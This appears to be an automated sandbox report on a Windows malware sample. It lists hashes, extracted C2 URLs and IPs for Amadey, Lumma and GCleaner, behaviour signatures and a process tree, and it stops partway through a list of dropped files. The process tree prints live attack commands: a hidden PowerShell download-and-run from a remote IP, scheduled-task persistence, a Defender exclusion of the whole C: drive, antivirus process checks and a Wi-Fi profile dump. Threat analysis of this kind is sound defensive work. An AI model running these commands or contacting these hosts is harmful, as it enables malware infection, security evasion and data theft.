Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/04/2025, 08:33

General

  • Target

    2025-04-04_70a877a407ac3ff8da8241278dc4dc41_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    70a877a407ac3ff8da8241278dc4dc41

  • SHA1

    8683fa24402be741c6397c6dbed8f806d39cc4c4

  • SHA256

    82d86b6d20babb2486ad1f9939af00b00e807017c4a6239dec0d87ee9512199d

  • SHA512

    f7d879f2b970570622b0953f8b532e6075fd4de8264a1d68354c22d64c02482046aa8223ee0264ffd1248b2859e75556aa1aa459041524e13dd40d34e75e97a3

  • SSDEEP

    24576:KqDEvCTbMWu7rQYlBQcBiT6rprG8a0Pu:KTvC/MTQYxsWR7a0P

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://xrfxcaseq.live/gspaz

https://jrxsafer.top/shpaoz

https://gkrxspint.digital/kendwz

https://erhxhube.run/pogrs

https://grxeasyw.digital/xxepw

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://ywmedici.top/noagis

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://atargett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://0scenarisacri.top/gHSAYuqo

https://njrxsafer.top/shpaoz

https://zkrxspint.digital/kendwz

https://rhxhube.run/pogrs

Extracted

Family

gcleaner

C2

185.156.73.98

45.91.200.135

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 17 IoCs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 29 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 62 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-04_70a877a407ac3ff8da8241278dc4dc41_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_70a877a407ac3ff8da8241278dc4dc41_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4892
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn dPCLtma2j0x /tr "mshta C:\Users\Admin\AppData\Local\Temp\mCCACUQnw.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2996
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn dPCLtma2j0x /tr "mshta C:\Users\Admin\AppData\Local\Temp\mCCACUQnw.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:5020
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\mCCACUQnw.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3020
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JFV2FZVNSG84ZBYSCPQHBCSQHYKB4S1S.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1556
        • C:\Users\Admin\AppData\Local\TempJFV2FZVNSG84ZBYSCPQHBCSQHYKB4S1S.EXE
          "C:\Users\Admin\AppData\Local\TempJFV2FZVNSG84ZBYSCPQHBCSQHYKB4S1S.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3012
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4756
            • C:\Users\Admin\AppData\Local\Temp\10443260101\qhjMWht.exe
              "C:\Users\Admin\AppData\Local\Temp\10443260101\qhjMWht.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:816
            • C:\Users\Admin\AppData\Local\Temp\10444360101\50bfea0142.exe
              "C:\Users\Admin\AppData\Local\Temp\10444360101\50bfea0142.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2548
            • C:\Users\Admin\AppData\Local\Temp\10444370101\15fc8d1069.exe
              "C:\Users\Admin\AppData\Local\Temp\10444370101\15fc8d1069.exe"
              6⤵
              • Executes dropped EXE
              PID:4892
            • C:\Users\Admin\AppData\Local\Temp\10444380101\54d8f4556a.exe
              "C:\Users\Admin\AppData\Local\Temp\10444380101\54d8f4556a.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2364
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn 6Hl1jmaunf1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\eC6LyjYdP.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3944
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn 6Hl1jmaunf1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\eC6LyjYdP.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2684
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\eC6LyjYdP.hta
                7⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2960
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ETCCFPB0Y47WLMFRQY6R04JQC445IP3R.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4084
                  • C:\Users\Admin\AppData\Local\TempETCCFPB0Y47WLMFRQY6R04JQC445IP3R.EXE
                    "C:\Users\Admin\AppData\Local\TempETCCFPB0Y47WLMFRQY6R04JQC445IP3R.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2988
            • C:\Users\Admin\AppData\Local\Temp\10444390101\c2bd455eff.exe
              "C:\Users\Admin\AppData\Local\Temp\10444390101\c2bd455eff.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:468
            • C:\Users\Admin\AppData\Local\Temp\10444400101\0341cceeca.exe
              "C:\Users\Admin\AppData\Local\Temp\10444400101\0341cceeca.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1536
              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                "C:\Users\Admin\AppData\Local\Temp\10444400101\0341cceeca.exe"
                7⤵
                • Downloads MZ/PE file
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:4256
            • C:\Users\Admin\AppData\Local\Temp\10444410101\27a854c611.exe
              "C:\Users\Admin\AppData\Local\Temp\10444410101\27a854c611.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3256
              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                "C:\Users\Admin\AppData\Local\Temp\10444410101\27a854c611.exe"
                7⤵
                • Downloads MZ/PE file
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2428
            • C:\Users\Admin\AppData\Local\Temp\10444420101\qhjMWht.exe
              "C:\Users\Admin\AppData\Local\Temp\10444420101\qhjMWht.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3228
            • C:\Users\Admin\AppData\Local\Temp\10444430101\ICQ0sog.exe
              "C:\Users\Admin\AppData\Local\Temp\10444430101\ICQ0sog.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:2708
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:3192
            • C:\Users\Admin\AppData\Local\Temp\10444440101\larBxd7.exe
              "C:\Users\Admin\AppData\Local\Temp\10444440101\larBxd7.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              PID:4132
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat
                7⤵
                • System Location Discovery: System Language Discovery
                PID:4760
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  8⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4724
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "opssvc wrsa"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:4792
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  8⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5044
                • C:\Windows\SysWOW64\findstr.exe
                  findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:3148
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c md 689912
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2708
                • C:\Windows\SysWOW64\extrac32.exe
                  extrac32 /Y /E Exclusion.psd
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:3676
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /V "users" Findarticles
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2744
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b 689912\Jordan.com + Bg + Batteries + Boss + Illustrations + Boards + Within + Pushed + Brunei + Dead 689912\Jordan.com
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1684
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b ..\Customized.psd + ..\Permits.psd + ..\Teeth.psd + ..\Feel.psd + ..\Nonprofit.psd + ..\Shoes.psd + ..\Bruce.psd b
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:3844
                • C:\Users\Admin\AppData\Local\Temp\689912\Jordan.com
                  Jordan.com b
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:3176
                • C:\Windows\SysWOW64\choice.exe
                  choice /d y /t 5
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:876
            • C:\Users\Admin\AppData\Local\Temp\10444450101\Yhihb8G.exe
              "C:\Users\Admin\AppData\Local\Temp\10444450101\Yhihb8G.exe"
              6⤵
              • Executes dropped EXE
              • Accesses Microsoft Outlook profiles
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:3456
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                7⤵
                • System Location Discovery: System Language Discovery
                • System Network Configuration Discovery: Wi-Fi Discovery
                PID:1328
                • C:\Windows\SysWOW64\chcp.com
                  chcp 65001
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1172
                • C:\Windows\SysWOW64\netsh.exe
                  netsh wlan show profile
                  8⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  PID:1620
                • C:\Windows\SysWOW64\findstr.exe
                  findstr All
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1344
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 2420
                7⤵
                • Program crash
                PID:3396
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                7⤵
                • System Location Discovery: System Language Discovery
                PID:3868
                • C:\Windows\SysWOW64\chcp.com
                  chcp 65001
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:428
                • C:\Windows\SysWOW64\netsh.exe
                  netsh wlan show networks mode=bssid
                  8⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:4676
            • C:\Users\Admin\AppData\Local\Temp\10444460101\9sWdA2p.exe
              "C:\Users\Admin\AppData\Local\Temp\10444460101\9sWdA2p.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1376
            • C:\Users\Admin\AppData\Local\Temp\10444470101\TbV75ZR.exe
              "C:\Users\Admin\AppData\Local\Temp\10444470101\TbV75ZR.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:4184
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                7⤵
                  PID:4616
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2348
              • C:\Users\Admin\AppData\Local\Temp\10444480101\7IIl2eE.exe
                "C:\Users\Admin\AppData\Local\Temp\10444480101\7IIl2eE.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:3776
                • C:\Windows\SysWOW64\CMD.exe
                  "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:1816
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    8⤵
                    • Enumerates processes with tasklist
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2300
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /I "opssvc wrsa"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:4908
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    8⤵
                    • Enumerates processes with tasklist
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2808
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:872
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c md 418377
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:876
                  • C:\Windows\SysWOW64\extrac32.exe
                    extrac32 /Y /E Leon.cab
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:60
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /V "BEVERAGES" Compilation
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2792
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2344
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:4148
                  • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                    Passwords.com N
                    8⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:4080
                  • C:\Windows\SysWOW64\choice.exe
                    choice /d y /t 5
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2032
              • C:\Users\Admin\AppData\Local\Temp\10444490101\UZPt0hR.exe
                "C:\Users\Admin\AppData\Local\Temp\10444490101\UZPt0hR.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: MapViewOfSection
                PID:4300
                • C:\Windows\SYSTEM32\cmd.exe
                  cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                  7⤵
                    PID:1620
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell.exe Add-MpPreference -ExclusionPath 'C:'
                      8⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2680
                  • C:\Windows\system32\svchost.exe
                    "C:\Windows\system32\svchost.exe"
                    7⤵
                    • Downloads MZ/PE file
                    • Adds Run key to start application
                    PID:4816
                    • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                      "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                      8⤵
                      • Executes dropped EXE
                      PID:2336
                    • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                      "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                      8⤵
                      • Deletes itself
                      • Executes dropped EXE
                      PID:1892
                • C:\Users\Admin\AppData\Local\Temp\10444500101\11f0b036bb.exe
                  "C:\Users\Admin\AppData\Local\Temp\10444500101\11f0b036bb.exe"
                  6⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Writes to the Master Boot Record (MBR)
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  PID:4412
                • C:\Users\Admin\AppData\Local\Temp\10444510101\81a3532a80.exe
                  "C:\Users\Admin\AppData\Local\Temp\10444510101\81a3532a80.exe"
                  6⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  PID:6828
                • C:\Users\Admin\AppData\Local\Temp\10444520101\Rm3cVPI.exe
                  "C:\Users\Admin\AppData\Local\Temp\10444520101\Rm3cVPI.exe"
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:7128
      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        1⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:3256
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3456 -ip 3456
        1⤵
          PID:3092
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          1⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:2144
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
          1⤵
            PID:4916
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
            1⤵
              PID:4584

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

              Filesize

              2KB

              MD5

              25604a2821749d30ca35877a7669dff9

              SHA1

              49c624275363c7b6768452db6868f8100aa967be

              SHA256

              7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

              SHA512

              206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\54M48DI2\soft[1]

              Filesize

              3.0MB

              MD5

              91f372706c6f741476ee0dac49693596

              SHA1

              8e8973d35d3de0ade6cc8e44cd21f2cffbdfe83d

              SHA256

              9a401dded25b4bafd24225449ed48468787290bbb308dc5e40511da2858bb781

              SHA512

              88b26c1c49bc2a77dbdcea0e22c33555932498b3a4cff66f6b08438c0d96a017367c14508249aa1ca2090ed0ca6081e28757fbda97f856675d9db9cc61f7b7ed

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\EAO45EME\success[1].htm

              Filesize

              1B

              MD5

              cfcd208495d565ef66e7dff9f98764da

              SHA1

              b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

              SHA256

              5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

              SHA512

              31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              16KB

              MD5

              4397495bf82ee8fc574a43d1f3167227

              SHA1

              4dd188828e4c0e68a2a66ea8593f71396982649e

              SHA256

              a2426905257867a265c09cc958b3a2cc4d1a6a9c4b60bb0c303c7acea6caad99

              SHA512

              2849fe9ecc5914930cabb1550901dc064a54750bfbba27e5897ad83059d21c29f2b03ab8d3dd5e8e43b927343c18ae685998f512a8008efd75cbe9bdebe96de8

            • C:\Users\Admin\AppData\Local\TempJFV2FZVNSG84ZBYSCPQHBCSQHYKB4S1S.EXE

              Filesize

              1.8MB

              MD5

              abe8e7e6bf6a1a89e412b97de97a38d0

              SHA1

              2625d9673d0b07ae322160c0a3a925fc0d218331

              SHA256

              051e9a938906bf4c1b9f03ff6e118a2361d0e7f0bc6032b8762c3041fa470bfc

              SHA512

              91e8074f1ea4d733cf87f49063890d5b8981194c3beee48f806973bc2d9a451c136d902856ec13446aca87a82ede685e1f7e25022f592fa0eb9a79779e42739b

            • C:\Users\Admin\AppData\Local\Temp\10443260101\qhjMWht.exe

              Filesize

              5.8MB

              MD5

              1dbdcaeaac26f7d34e872439997ee68d

              SHA1

              18c855f60fb83306f23634b10841655fb32a943b

              SHA256

